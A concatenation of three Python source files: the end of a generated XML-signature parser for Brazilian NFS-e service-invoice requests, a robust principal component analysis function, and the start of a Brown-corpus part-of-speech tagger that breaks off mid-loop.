self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='ReferenceType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='ReferenceType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
if self.URI is not None and 'URI' not in already_processed:
already_processed.add('URI')
outfile.write(' URI=%s' % (quote_attrib(self.URI), ))
if self.Type is not None and 'Type' not in already_processed:
already_processed.add('Type')
outfile.write(' Type=%s' % (quote_attrib(self.Type), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='ReferenceType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Transforms is not None:
self.Transforms.export(outfile, level, namespace_, name_='Transforms', pretty_print=pretty_print)
if self.DigestMethod is not None:
self.DigestMethod.export(outfile, level, namespace_, name_='DigestMethod', pretty_print=pretty_print)
if self.DigestValue is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DigestValue>%s</ns1:DigestValue>%s' % (self.gds_format_base64(self.DigestValue, input_name='DigestValue'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
value = find_attr_value_('URI', node)
if value is not None and 'URI' not in already_processed:
already_processed.add('URI')
self.URI = value
value = find_attr_value_('Type', node)
if value is not None and 'Type' not in already_processed:
already_processed.add('Type')
self.Type = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Transforms':
obj_ = TransformsType.factory()
obj_.build(child_)
self.Transforms = obj_
obj_.original_tagname_ = 'Transforms'
elif nodeName_ == 'DigestMethod':
obj_ = DigestMethodType.factory()
obj_.build(child_)
self.DigestMethod = obj_
obj_.original_tagname_ = 'DigestMethod'
elif nodeName_ == 'DigestValue':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'DigestValue')
else:
bval_ = None
self.DigestValue = bval_
# validate type DigestValueType
self.validate_DigestValueType(self.DigestValue)
# end class ReferenceType
class TransformsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Transform=None):
self.original_tagname_ = None
if Transform is None:
self.Transform = []
else:
self.Transform = Transform
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TransformsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TransformsType.subclass:
return TransformsType.subclass(*args_, **kwargs_)
else:
return TransformsType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Transform
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='TransformsType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TransformsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='TransformsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='TransformsType'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='TransformsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Transform_ in self.Transform:
Transform_.export(outfile, level, namespace_, name_='Transform', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Transform':
obj_ = TransformType.factory()
obj_.build(child_)
self.Transform.append(obj_)
obj_.original_tagname_ = 'Transform'
# end class TransformsType
class TransformType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None, XPath=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
if XPath is None:
self.XPath = []
else:
self.XPath = XPath
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TransformType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TransformType.subclass:
return TransformType.subclass(*args_, **kwargs_)
else:
return TransformType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.XPath
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='TransformType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TransformType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='TransformType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='TransformType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='TransformType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for XPath_ in self.XPath:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:XPath>%s</ns1:XPath>%s' % (self.gds_encode(self.gds_format_string(quote_xml(XPath_), input_name='XPath')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'XPath':
XPath_ = child_.text
XPath_ = self.gds_validate_string(XPath_, node, 'XPath')
self.XPath.append(XPath_)
# end class TransformType
class KeyInfoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, X509Data=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.X509Data = X509Data
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, KeyInfoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if KeyInfoType.subclass:
return KeyInfoType.subclass(*args_, **kwargs_)
else:
return KeyInfoType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.X509Data is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='KeyInfoType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('KeyInfoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='KeyInfoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='KeyInfoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='KeyInfoType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='KeyInfoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.X509Data is not None:
self.X509Data.export(outfile, level, namespace_, name_='X509Data', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'X509Data':
obj_ = X509DataType.factory()
obj_.build(child_)
self.X509Data = obj_
obj_.original_tagname_ = 'X509Data'
# end class KeyInfoType
class X509DataType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, X509Certificate=None):
self.original_tagname_ = None
self.X509Certificate = X509Certificate
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, X509DataType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if X509DataType.subclass:
return X509DataType.subclass(*args_, **kwargs_)
else:
return X509DataType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.X509Certificate is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='X509DataType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('X509DataType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='X509DataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='X509DataType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='X509DataType'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='X509DataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.X509Certificate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:X509Certificate>%s</ns1:X509Certificate>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.X509Certificate), input_name='X509Certificate')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'X509Certificate':
X509Certificate_ = child_.text
X509Certificate_ = self.gds_validate_string(X509Certificate_, node, 'X509Certificate')
self.X509Certificate = X509Certificate_
# end class X509DataType
class CanonicalizationMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, CanonicalizationMethodType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if CanonicalizationMethodType.subclass:
return CanonicalizationMethodType.subclass(*args_, **kwargs_)
else:
return CanonicalizationMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='CanonicalizationMethodType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('CanonicalizationMethodType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='CanonicalizationMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='CanonicalizationMethodType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='CanonicalizationMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='CanonicalizationMethodType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class CanonicalizationMethodType
class SignatureMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignatureMethodType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignatureMethodType.subclass:
return SignatureMethodType.subclass(*args_, **kwargs_)
else:
return SignatureMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='SignatureMethodType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignatureMethodType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignatureMethodType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignatureMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignatureMethodType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class SignatureMethodType
class DigestMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, DigestMethodType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if DigestMethodType.subclass:
return DigestMethodType.subclass(*args_, **kwargs_)
else:
return DigestMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='DigestMethodType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('DigestMethodType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='DigestMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='DigestMethodType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='DigestMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='DigestMethodType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class DigestMethodType
GDSClassesMapping = {
'Signature': SignatureType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print(USAGE_TEXT)
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:ns1="http://localhost:8080/WsNFe2/lote"',
pretty_print=True)
return rootObj
def parseEtree(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
if not silence:
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
if sys.version_info.major == 2:
from StringIO import StringIO as IOBuffer
else:
from io import BytesIO as IOBuffer
parser = None
doc = parsexml_(IOBuffer(inString), parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:ns1="http://localhost:8080/WsNFe2/lote"')
return rootObj
def parseLiteral(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('#from ReqConsultaNFSeRPS import *\n\n')
sys.stdout.write('import ReqConsultaNFSeRPS as model_\n\n')
sys.stdout.write('rootObj = model_.rootClass(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"CabecalhoType",
"CanonicalizationMethodType",
"DigestMethodType",
"KeyInfoType",
"ReferenceType",
"ReqConsultaNFSeRPS",
"SignatureMethodType",
"SignatureType",
"SignatureValueType",
"SignedInfoType",
"TransformType",
"TransformsType",
"X509DataType",
"tpBairroCompleto",
"tpCPFCNPJ2",
"tpChaveNFe",
"tpChaveNFeRPS",
"tpChaveRPS",
"tpChaveSubstituicaoNFSe",
"tpConsultaNFSe",
"tpDeducoes",
"tpDetalhesConsultaRPS",
"tpEndereco",
"tpEvento",
"tpInformacoesLote",
"tpItens",
"tpListaAlertas",
"tpListaDeducoes",
"tpListaDetalhesConsultaRPS",
"tpListaErros",
"tpListaItens",
"tpListaNFSe",
"tpListaNFSeConsultaNota",
"tpListaNFSeRPS",
"tpLogradouroCompleto",
"tpLote",
"tpLoteCancelamentoNFSe",
"tpLoteConsultaNFSe",
"tpNFSe",
"tpNotaCancelamentoNFSe",
"tpNotaConsultaNFSe",
"tpNotasCancelamentoNFSe",
"tpNotasConsultaNFSe",
"tpRPS",
"tpRPSConsultaNFSe",
"tpRPSsConsultaNFSe",
"tpRetornoNotasCancelamentoNFSe"
]
|
py | 1a37e7c70bb465c4c1a5cfbe663addbec99c0edf | """
Robust Principal Component Analysis
"""
import numpy as np
from numpy.linalg import norm
from numpy.linalg import svd
def rpca_alm(M, mu=None, l=None, mu_tol=1E7, tol=1E-7, max_iter=1000):
"""Matrix recovery/decomposition using Robust Principal Component Analysis
Decompose a rectengular matrix M into a low-rank component, and a sparse
component, by solving a convex minimization problem via Augmented Lagrangian
Method.
minimize ||A||_* + λ ||E||_1
subject to A + E = M
where ||A||_* is the nuclear norm of A (sum of singular values)
- surrogate of matrix rank
||E||_1 is the l1 norm of E (absolute values of elements)
- surrogate of matrix sparseness
Relaxed to
L(A,E,Y,λ) .= ||A||_* + λ||E||_1 + <Y, M-A-E> + µ/2 ||M-A-E||_F^2
Parameters
----------
M : array-like, shape (n_samples, n_features)
Matrix to decompose, where n_samples in the number of samples and
n_features is the number of features.
l : float (default 1/sqrt(max(m,n)), for m x n of M)
Parameter λ (lambda) of the convex problem ||A||_* + λ ||E||_1. [2]_
mu : float (default 1.25 * ||M||_2)
Parameter µ (mu) of the Augmented Lagrange Multiplier form of Principal
Component Pursuit (PCP). [2]_
mu_tol : float >= 0 (default 1E-7)
Weight parameter.
tol : float >= 0 (default 1E-7)
Tolerance for accuracy of matrix reconstruction of low rank and sparse
components.
max_iter : int >= 0 (default 1000)
Maximum number of iterations to perform.
Returns
-------
A : array, shape (n_samples, n_features)
Low-rank component of the matrix decomposition.
E : array, shape (n_samples, n_features)
Sparse component of the matrix decomposition.
err : float
Error of matrix reconstruction
||M-A-E||_F / ||M||_F
References
----------
.. [1] Z. Lin, M. Chen, Y. Ma. The Augmented Lagrange Multiplier Method for
Exact Recovery of Corrupted Low-Rank Matrices, arXiv:1009.5055
.. [2] E. J. Candés, X. Li, Y. Ma, J. Wright. Robust principal
component analysis? Journal of the ACM v.58 n.11 May 2011
"""
rho = 1.5
if not mu:
mu = 1.25 * norm(M, ord=2)
if not l:
l = np.max(M.shape)**-.5
M_sign = np.sign(M)
norm_spectral = norm(M_sign, ord=2)
norm_inf = norm(M_sign, ord=np.inf)
norm_dual = np.max([norm_spectral, norm_inf * l**-1])
Y = M_sign * norm_dual**-1
A = np.zeros(M.shape)
E = np.zeros(M.shape)
err = np.inf
i = 0
while err > tol and i < max_iter:
U, S, V = svd(M - E + Y * mu**-1, full_matrices=False)
A = np.dot(U, np.dot(np.diag(_shrink(S, mu**-1)), V))
E = _shrink(M - A + Y * mu**-1, l * mu**-1)
Y = Y + mu * (M - A - E)
err = _fro_error(M, A, E)
mu *= rho
mu = np.min([mu, mu_tol])
i += 1
return A, E, err
def _fro_error(M, A, E):
"""Error of matrix reconstruction"""
return norm(M - A - E, ord='fro') * norm(M, ord='fro')**-1
def _shrink(M, t):
"""Shrinkage operator"""
return np.sign(M) * np.maximum((np.abs(M) - t), np.zeros(M.shape))
|
py | 1a37e8e058433bcdd76efae7fcfbc51361470c8d | #PART 1 - CORPUS
import random
import time
import csv
from collections import Counter
t1=time.time()
print("Warning: This program is long, and takes some time to execute, because of the big file sizes.")
print("It took around 30s on an i7 7700HQ laptop with 16 GB of RAM. Performance might vary.")
def combine_lists(l1, l2):
return list(map(lambda x, y:"{} {}".format(x,y), l1, l2))
def givetaggivenword(some_dict):
temp_dict={}
temp=list(some_dict.values())
for a_dict in temp:
for tag in a_dict:
if tag in temp_dict:
temp_dict[tag]=temp_dict[tag]+a_dict[tag]
else:
temp_dict[tag]=a_dict[tag]
best_tag=keywithmaxval(temp_dict)
return(best_tag)
#Function to return the key having maximum value in a dictionary
def keywithmaxval(dic):
val=list(dic.values())
key=list(dic.keys())
return key[val.index(max(val))]
def givesingletons(arr):
freq = Counter(arr)
return [elem for elem in arr if freq[elem] == 1]
#MODEL SCRAPPED AS NOT ENOUGH TIME
#Function to give a tag which is calculated randomly by using the test tag set frequency as weights
# def weighted_random_tag(tag_list):
# import numpy as np
# unique_elements, counts_elements = np.unique(tag_list, return_counts=True)
# counts_elements=counts_elements/np.sum(counts_elements)
# weighted_tag=np.random.choice(unique_elements,p=counts_elements)
# return(weighted_tag)
#Open File and read brown.txt
file=open("brown.txt","r")
all_text=file.read()
file.close()
clean_text=all_text.strip()
#Get all words along with their tags
trainfile=open("brown-train.txt","w")
testfile=open("brown-test.txt","w")
all_words=clean_text.split()
all_sent=[]
sent=""
#Join words to form sentences using the following loop
i=0 #Number of sentences
for word in all_words:
if word[-2:]=="/.":
sent=sent+word+" "
all_sent.append(sent.strip())
if len(all_sent[-1])==3: #This is to remove all duplicates
# print("All sent of -2 is{}".format(all_sent[-2]))
# print("All sent of -1 is{}".format(all_sent[-1]))
# print("Current sent is{}".format(sent))
# print(all_sent[-1])
del all_sent[-1]
i=i-1
sent=""
i=i+1
continue
sent=sent+word+" "
#The first 2000 sentences of all sentences will form training set, while remaining will form test dataset
train_sent=all_sent[:2000]
test_sent=all_sent[2000:]
trainfile.write('\n'.join(train_sent))
testfile.write('\n'.join(test_sent))
#Write these training and test datasets to files
trainfile.close()
testfile.close()
print("brown-train.txt saved succesfully.")
print("brown-test.txt saved succesfully.")
#PART 2 - TAGGER IMPLEMENTATION
#Subpart 1 - Unigram
print("------------UNIGRAM------------")
#Create a nested dictionary of form {WORD1:{Tag1:Freqeuncy,Tag2:Freqeuncy,Tag3:Freqeuncy...},WORD2:{Tag1:Freqeuncy,Tag2:Freqeuncy,Tag3:Freqeuncy...},WORD3:{Tag1:Freqeuncy,Tag2:Freqeuncy,Tag3:Freqeuncy...}...}
unigram_tagger_dict={} #Nested Dictionary
unigram_list=[] #List of all unigrams
tag_list=[] #List of all tags
for sent in train_sent:
for word in sent.split():
unigram=word.rsplit("/",1)[0]
tag=word.rsplit("/",1)[1]
unigram_list.append(unigram)
tag_list.append(tag)
#A Tag Dictionary for the current word i.e for current word {Tag1,Tag2,Tag3...}
if unigram in unigram_tagger_dict:
tag_dict=unigram_tagger_dict[unigram]
else:
tag_dict={}
if tag not in tag_dict:
tag_dict[tag]=0
tag_dict[tag]=tag_dict[tag]+1
unigram_tagger_dict[unigram]=tag_dict
#Get the list of all unique unigrams and tags
unigram_set=list(set(unigram_list))
tag_set=list(set(tag_list))
max_tag_unigram_dict={}
unigramfile=open("unigram-tag.txt","w")
#Find out the most frequent tag for each word in training set and store as a dictionary
for unigram in unigram_set:
current_unigram_dict=unigram_tagger_dict[unigram]
